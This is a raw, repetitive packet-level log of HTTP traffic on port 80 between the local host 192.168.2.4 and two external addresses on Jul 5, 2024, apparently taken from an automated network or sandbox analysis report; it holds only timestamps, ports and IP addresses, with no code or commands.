                                                                Jul 5, 2024 04:23:18.202699900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202709913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202745914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202804089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202815056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202826023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202836990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202847004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202855110 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202858925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202868938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202872038 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202883959 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202898979 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.202944994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202956915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.202990055 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203031063 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203042030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203051090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203063011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203073978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203079939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203090906 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203115940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203191996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203202963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203211069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203222990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203233957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203236103 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203246117 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203248978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203258038 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203269005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203274965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203289032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203299999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203299999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203313112 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203325033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203334093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203335047 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203344107 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203346968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203377008 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203402042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203404903 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203413010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203423977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203434944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203450918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203452110 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203461885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203471899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203476906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.203488111 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.203507900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.214513063 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.214533091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.214544058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.214567900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.214592934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.214653969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.214663982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.214673042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.214688063 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.214705944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.214716911 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.214740038 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.214903116 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.292166948 CEST804974877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:18.292218924 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:18.292828083 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:18.292968988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.292988062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.292999029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293016911 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293034077 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293232918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293243885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293252945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293265104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293275118 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293282032 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293286085 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293292999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293298006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293301105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293329000 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293335915 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293339968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293351889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293366909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293371916 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293379068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293380022 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293390989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293402910 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293406963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293412924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293421984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293423891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293436050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293456078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293467045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293478966 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293483019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293488979 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293518066 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293623924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293633938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293642998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293658018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293668032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293669939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293678045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293689013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293690920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293699980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293709040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293714046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293720961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293725967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293745041 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293756008 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293775082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293781996 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293879986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293890953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293900013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293911934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293921947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293926954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293934107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293945074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293951035 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293960094 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.293961048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.293987036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.294006109 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.296554089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296565056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296576977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296591043 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.296616077 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.296622992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296629906 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.296636105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296648026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296658993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296669006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.296689987 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.296713114 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.296773911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296783924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296793938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296804905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296812057 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.296816111 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296821117 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.296828032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296838045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296847105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296852112 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.296858072 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.296858072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.296895027 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.296916962 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297081947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297091961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297101021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297111988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297122955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297131062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297135115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297147036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297149897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297158003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297161102 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297173023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297183990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297188997 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297195911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297208071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297214985 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297223091 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297226906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297240019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297249079 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297251940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297264099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297269106 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297286987 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297313929 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297439098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297456026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297467947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297478914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297488928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297497988 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297502041 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297516108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297521114 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297528028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297530890 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297538996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297549963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297559023 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297559977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297570944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297571898 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297584057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297591925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297595978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297606945 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297610044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297621965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297632933 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297632933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297645092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297648907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297657967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297672987 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297697067 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297826052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297837019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297852993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297863007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297868013 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297874928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297887087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297890902 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297898054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297899961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297914028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297915936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.297925949 CEST804974877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:18.297926903 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297947884 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.297961950 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.310538054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.310549974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.310559988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.310591936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.310631037 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.310646057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.310657024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.310666084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.310677052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.310683966 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.310699940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.310725927 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.386348009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386400938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.386586905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386635065 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.386706114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386717081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386749983 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.386811018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386821032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386826038 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386831045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386859894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386868954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.386872053 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386883974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386909008 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.386930943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.386938095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386948109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386957884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.386984110 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387006044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387051105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387063026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387077093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387094021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387094975 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387106895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387109041 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387116909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387129068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387135029 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387149096 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387172937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387449980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387501001 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387687922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387701988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387712002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387727022 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387742043 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387742043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387772083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387784004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387813091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387824059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387835026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387845039 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387851000 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387877941 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387891054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387898922 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387904882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387931108 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387942076 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.387964964 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387975931 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387985945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.387996912 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388003111 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388006926 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388016939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388035059 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388051987 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388084888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388096094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388106108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388117075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388123989 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388128042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388134003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388140917 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388159037 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388180971 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388223886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388235092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388243914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388254881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388261080 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388267040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388283968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388286114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388309002 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388318062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.388364077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388375998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.388396978 CEST804973285.28.47.30192.168.2.4
